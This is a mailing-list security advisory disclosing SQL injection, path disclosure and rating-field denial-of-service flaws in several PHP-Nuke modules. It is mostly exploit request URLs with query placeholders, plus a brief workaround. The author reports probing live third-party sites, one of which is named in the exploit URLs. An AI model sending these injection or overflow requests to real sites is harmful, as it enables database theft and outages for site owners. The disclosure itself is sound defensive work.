[<prev] [next>] [day] [month] [year] [list]
Message-ID: <008201c32eba$c2d50140$050010ac@rootserver>
From: novappc at novappc.com (Lorenzo Hernandez Garcia-Hierro)
Subject: PHP-Nuke Main Modules SQL Injections , Path Disclosures and Denial of Service Attack in Rating Systems
-------
Product: PHP-Nuke
Vendor: Francisco Burzi
Versions Vulnerable:
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5 FINAL
Francisco Burzi PHP-Nuke 6.5 BETA 1
Francisco Burzi PHP-Nuke 6.5
6.5 with all patches ,
6.0 with all patches.
5.5 with all patches
No vulnerable:
?
------
DESCRIPTION:
------
New SQL Injections and Paths Disclosures related to the main modules.
Please , look at the final ` , other sql injections don't use this but this
very important for make a successful query.
--------
FOUND VULNERABLE MODULES:
--------
--------
- SECTIONS (NEW)
--------
Type: SQL Injection and Path Disclosure
*********
Exploit:
http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR
QUERY] (NEW)
-
http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR QUERY]
(NEW)
-
http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR QUERY]
(NEW)
--------
-AVANTGO
--------
Type: SQL Injection and Path disclosure. (NEW)
*********
Exploit:
http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]
--------
-SURVEYS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:
http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]
-
http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR
QUERY]&mode=&order=0&thold=0
--------
-DOWNLOADS
--------
Type: SQL Injection and Path disclosure. (NEW)
********
Exploit:
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR
QUERY]
-
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR
QUERY]&orderby=titleD
-------------
NEW TYPE OF PHPNUKE ATTACK IN DOWNLOADS MODULE (NEW)
-------------
I found a denial of service possible attack in Downloads module trought
rating system,
Exploit:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO
RATE]&ratinguser=?&ratinghost_name=?&rating=99999999999999999999999999999999
999999999999999999999999999999999999999
When the file is rated the file gets a 238,609,298.89 rating , this can be
used for make a denial of service attack to the mysql server or send a very
long buffer (buffer overflow, stack crashes). The mysql server puts this
because there's and error with the query ( more characters in field than the
allowed number of characters) if you send a buffer more long than the
allowed/accepted the server be unstable and the system pick up.
Exploit to SQL Injection and Denial of Service Attack:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO
RATE]&ratinguser=?&ratinghost_name=?&rating=`[HERE GOES SQL QUERY]
--------
- REVIEWS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:
http://[target]/modules.php?name=Reviews&rop=showcontent&id=`[YOUR QUERY]
--------
- WEB_LINKS
--------
Type: SQL Injection (NEW) and Path disclosure.(NEW)
********
Exploit:
http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]
-
http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`[YOUR
QUERY]&ratetype=num
- Web-Links module is affected by the DoS possible attack that i discovered
and the SQL Injections and buffer overflows:
Exploit:
http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?&ratingh
ost_name=?&rating=[DATA]
[DATA] = your random data to send ( rating points and the field buffer , of
course ).
--------
SOLUTION:
--------
- Deactivate enterelly the affected modules.
- A temporal workaround for Path Disclosure is configuring in php.ini the
reported error flags ( no report) but this is not very good solution (
WORKAROUND).
-----
WHAT CAN BE HAPPEN? AND NOTES
-----
Gain Access to phpnuke database , content changing , gain access to private
info, server paths reveled. Mysql server buffer overflow,Mysql server pick
up , server pick up.
-NOTES-
I tested it in phpnuke-espanol.org and it is vulnerable to all.
I tested it in phpnuke.org and it is vulnerable on active modules affected
by this ( Downloads, Surveys )( some errors aren't reported because php.ini
is configured for this but the vulnerabilities are present.).
-----
CONTACT INFO :
---------------------------------------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--www.novappc.com --
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
Powered by blists - more mailing lists